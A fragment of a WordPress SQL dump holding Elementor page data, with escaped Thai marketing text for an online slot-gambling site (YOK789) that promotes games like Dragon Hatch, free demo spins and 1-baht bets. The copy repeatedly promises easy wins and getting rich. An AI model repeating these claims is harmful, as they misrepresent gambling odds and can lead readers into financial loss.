\\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2730,376,'_thumbnail_id','371'),(2731,376,'_elementor_edit_mode','builder'),(2732,376,'_elementor_template_type','wp-page'),(2733,376,'_elementor_version','3.35.5'),(2734,376,'_elementor_pro_version','3.32.3'),(2735,376,'_wp_page_template','default'),(2736,376,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2737,376,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 